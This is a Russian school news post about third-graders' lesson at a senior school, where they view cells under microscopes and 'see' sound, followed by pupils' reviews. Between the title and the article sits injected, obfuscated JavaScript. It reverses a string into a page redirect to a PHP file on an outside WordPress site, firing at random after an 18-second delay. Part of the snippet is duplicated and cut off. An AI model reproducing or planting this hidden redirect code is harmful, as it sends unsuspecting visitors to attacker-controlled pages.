logo

Путешествие в микромир биологии и физики

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to»>

26 сентября состоялся урок-исследование учеников 3А класса в средней школе. Говорят, что лучше один раз увидеть, чем сто раз услышать!  Особенно это важно для детей.

На уроке биологии, вместе в преподавателем Севальниковым А.А., ребята впервые познакомились с микроскопами.  Попав в царства живых организмов, ученики исследовали образцы клеток лука, грибов и инфузории-туфельки. Сравнив и проанализировав клетки живых организмов, ребята обсудили их сходства и различия, нарисовали схемы-диаграммы.  В интересный мир физики третьеклассников пригласил Дерри Сергей Томас.  Ребята не только услышали, но и увидели звук,  вместе с преподавателем думали и рассуждали о волнах звука.

Мы благодарим преподавателей старшей школы:  Cергея Т. Дерри (физика) и Андрея А. Севальникова (биология) за отличную возможность научиться новым знаниям о живой и неживой природе.

Отзывы учеников:

Артемьев Богдан:
Мне очень понравилась наша экскурсия-урок в старшей школе.  Я понял, что надо многому учиться. чтобы знать про микромир.  Оказывается, можно увидеть звук!  Я видел, как частички соли двигались, когда учитель включал музыку.  Я обязательно расскажу об этом своим друзьям. Хотелось бы почаще приезжать в старшую школу.

Лошманова Маша:
Я узнала много нового на уроках в старшей школе. Было интересно видеть клетки лука и инфузории-туфельки.  Оказывается, клетки разные и я это увидела. Мне так понравился урок биологии, что я решила стать ученым. Хочу изобрести самый сильный микроскоп и заглянуть поглубже в живую клетку.